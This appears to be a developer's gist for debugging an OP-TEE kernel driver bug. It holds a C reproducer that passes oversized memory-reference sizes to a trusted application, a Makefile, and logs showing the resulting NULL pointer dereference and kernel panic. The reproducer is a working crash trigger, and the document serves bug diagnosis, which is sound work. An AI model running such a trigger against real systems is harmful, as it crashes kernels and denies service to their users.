@masami256
Last active September 17, 2025 13:37
It contains the test code and test results used for debugging a NULL pointer dereference crash in the OP-TEE driver.
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tee_client_api.h>
// Copy from https://github.com/OP-TEE/optee_test/blob/master/ta/crypt/include/ta_crypt.h#L10C1-L13C54
/* This UUID is generated with the ITU-T UUID generator at
http://www.itu.int/ITU-T/asn1/uuid.html */
/* UUID of the optee_test "crypt" TA.  main() opens its session against this
   value, so the target needs that TA installed for the reproducer to run. */
#define TA_CRYPT_UUID { 0xcb3e5ba0, 0xadf1, 0x11e0, \
{ 0x99, 0x8b, 0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b } }
// based on xtest_tee_test_1004
int main(int argc, char **argv)
{
if (argc != 3) {
printf("Usage: %s <malicious buffer size(hex)> <actual buffer size>(hex)>\n", argv[0]);
exit(-1);
}
size_t malicious_size = strtoul(argv[1], NULL, 16);
size_t actual_size = strtoul(argv[2], NULL, 16);
int rc = 0;
printf("malicious_size: 0x%lx, actual_size: 0x%lx\n", malicious_size, actual_size);
TEEC_Session session = { };
TEEC_UUID uuid = TA_CRYPT_UUID;
TEEC_Context context = { };
TEEC_Result ret;
uint32_t ret_orig;
ret = TEEC_InitializeContext(NULL, &context);
if (ret != TEEC_SUCCESS) {
printf("[*]TEEC_InitializeContext() failed: error 0x%x\n", ret);
exit(-1);
}
ret = TEEC_OpenSession(&context, &session, &uuid,
TEEC_LOGIN_PUBLIC, NULL, NULL, &ret_orig);
if (ret != TEEC_SUCCESS) {
printf("[*]TEEC_OpenSession() failed: error 0x%x\n", ret);
exit(-1);
}
uint8_t *crypt_in = NULL;
uint8_t *crypt_out = NULL;
crypt_in = malloc(actual_size);
if (!crypt_in) {
printf("[*]malloc() failed\n");
rc = -1;
goto close_session;
}
crypt_out = malloc(actual_size);
if (!crypt_out) {
printf("[*]malloc() failed\n");
rc = -1;
goto free_crypt_in;
}
TEEC_Operation op = { };
op.params[0].tmpref.buffer = crypt_in;
op.params[0].tmpref.size = malicious_size;
op.params[1].tmpref.buffer = crypt_out;
op.params[1].tmpref.size = malicious_size;
op.paramTypes = TEEC_PARAM_TYPES(TEEC_MEMREF_TEMP_INPUT,
TEEC_MEMREF_TEMP_OUTPUT,
TEEC_NONE, TEEC_NONE);
ret = TEEC_InvokeCommand(&session,
3,
&op,
&ret_orig);
if (ret == TEEC_SUCCESS) {
printf("[+]TEEC_InvokeCommand() success\n");
} else {
printf("[*]TEEC_InvokeCommand() failed: error 0x%x\n", ret);
rc = -1;
}
free(crypt_out);
free_crypt_in:
free(crypt_in);
close_session:
TEEC_CloseSession(&session);
return rc;
}
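target = crash_test
CC = gcc
CFLAGS = -Wall
LDLIBS = -lteec

# The binary depends on its source so it is rebuilt only when the source
# changes (the original marked the binary itself .PHONY, forcing a rebuild on
# every run while `clean` was not phony).  CC/CFLAGS can be overridden on the
# command line for a cross build targeting the aarch64 board.
$(target): $(target).c
	$(CC) $(CFLAGS) $< -o $@ $(LDLIBS)

clean:
	rm -f $(target)

.PHONY: clean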

system info

# uname -a
Linux buildroot 6.17.0-rc5 #63 SMP PREEMPT Wed Sep 17 12:42:59 UTC 2025 aarch64 GNU/Linux
# free -m
              total        used        free      shared  buff/cache   available
Mem:            964          60         847           0          58         815
Swap:             0           0           0

No crash

# /mnt/crash_test 0xff 0xff
malicious_size: 0xff, actual_size: 0xff
[+]TEEC_InvokeCommand() success
# /mnt/crash_test 0xffff 0xff
malicious_size: 0xffff, actual_size: 0xff
[+]TEEC_InvokeCommand() success

NULL pointer dereference happened

# /mnt/crash_test 0xffffff 0xff
malicious_size: 0xffffff, actual_size: 0xff
ERR [150] LT:TEEC_InvokeCommand:730: TEE_IOC_INVOKE failed
[  184.072289] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008
[  184.072365] Mem abort info:
[  184.072411]   ESR = 0x0000000096000004
[  184.072431]   EC = 0x25: DABT (current EL), IL = 32 bits
[  184.072461]   SET = 0, FnV = 0
[  184.072474]   EA = 0, S1PTW = 0
[  184.072491]   FSC = 0x04: level 0 translation fault 
[  184.072511] Data abort info:
[  184.072521]   ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
** replaying previous printk message **
[  184.072534]   CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[  184.072546]   GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[  184.072594] user pgtable: 4k pages, 52-bit VAs, pgdp=00000000401c3c80
[  184.072616] [0000000000000008] pgd=0800000048cb5403, p4d=0000000000000000
[  184.073086] Internal error: Oops: 0000000096000004 [#1]  SMP
[  184.074426] Modules linked in:
[  184.074810] CPU: 1 UID: 0 PID: 150 Comm: crash_test Not tainted 6.17.0-rc5 #63 PREEMPT 
[  184.075078] Hardware name: linux,dummy-virt (DT)
[  184.075324] pstate: 21402005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
[  184.075556] pc : unpin_user_pages+0x78/0xd0
[  184.076058] lr : unpin_user_pages+0xa0/0xd0
[  184.076185] sp : ffff8000843cbd20
[  184.076276] x29: ffff8000843cbd20 x28: fff0000006bc5780 x27: 0000000000000000
[  184.076479] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000
[  184.076645] x23: fff00000004fb5a8 x22: 0000000000000001 x21: 000000000000001f
[  184.076819] x20: fff0000008bb0000 x19: 0000000000001001 x18: 0000000000000001
[  184.077041] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[  184.077282] x14: 0000000000000001 x13: 0000000000000002 x12: 00000000000360de
[  184.077521] x11: fff0000001dad700 x10: 000000000000003f x9 : 0000000000000d73
[  184.077754] x8 : 00000000000007e0 x7 : 0000000000000001 x6 : 000000000000001f
[  184.077919] x5 : ffffffffffffffff x4 : ffffffffffffffff x3 : 0000000000000020
[  184.078086] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffc1ffc0126780
[  184.078342] Call trace:
[  184.078525]  unpin_user_pages+0x78/0xd0 (P)
[  184.078708]  tee_shm_put+0x134/0x184
[  184.078821]  tee_shm_fop_release+0x14/0x24
[  184.078913]  __fput+0xcc/0x2dc
[  184.078986]  fput_close_sync+0x40/0x108
[  184.079081]  __arm64_sys_close+0x38/0x7c
[  184.079172]  invoke_syscall+0x48/0x110
[  184.079287]  el0_svc_common.constprop.0+0x40/0xe8
[  184.079411]  do_el0_svc+0x20/0x2c
[  184.079490]  el0_svc+0x34/0xf0
[  184.079566]  el0t_64_sync_handler+0xa0/0xe4
[  184.079665]  el0t_64_sync+0x198/0x19c
[  184.079916] Code: aa0203e3 eb02027f 54000109 f8627a82 (f9400444) 
[  184.080254] ---[ end trace 0000000000000000 ]---
[  184.080568] Kernel panic - not syncing: Oops: Fatal exception
[  184.080834] SMP: stopping secondary CPUs
[  184.081207] Kernel Offset: disabled
[  184.081299] CPU features: 0x000000,0000d180,2bbe33e1,957e7f3f
[  184.081440] Memory Limit: none
[  184.081713] ---[ end Kernel panic - not syncing: Oops: Fatal exception ]---